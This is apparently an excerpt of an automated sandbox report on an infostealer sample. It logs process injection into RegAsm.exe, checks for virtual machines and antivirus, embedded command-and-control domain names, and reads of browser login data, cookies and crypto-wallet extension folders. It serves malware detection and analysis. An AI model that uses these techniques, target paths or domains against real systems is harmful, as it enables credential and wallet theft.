          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: nlJ2sNaZVi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: nlJ2sNaZVi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: nlJ2sNaZVi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdbu source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdb source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmp
          Source: nlJ2sNaZVi.exeStatic PE information: 0xBE2D6ACE [Sun Feb 8 18:58:22 2071 UTC]
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042B319 push ebx; iretd 5_2_0042B31A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00440E2B push 0000007Bh; iretd 5_2_00440F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dllJump to dropped file
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: nlJ2sNaZVi.exe PID: 5700, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dllJump to dropped file
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe TID: 5024Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe TID: 6844Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1892Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: RegAsm.exe, 00000005.00000002.2209520966.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00437A80 LdrInitializeThunk,5_2_00437A80
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
          Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
          Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeFile written: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.csJump to dropped file
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tamedgeesy.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: relalingj.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rottieud.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: brownieyuz.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: explainvees.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ducksringjk.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: thinkyyokej.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: repostebhu.sbs
          Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: netwrokenb.cyou
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9F5008Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"Jump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeQueries volume information: C:\Users\user\Desktop\nlJ2sNaZVi.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\nlJ2sNaZVi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: RegAsm.exe, 00000005.00000002.2210105512.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
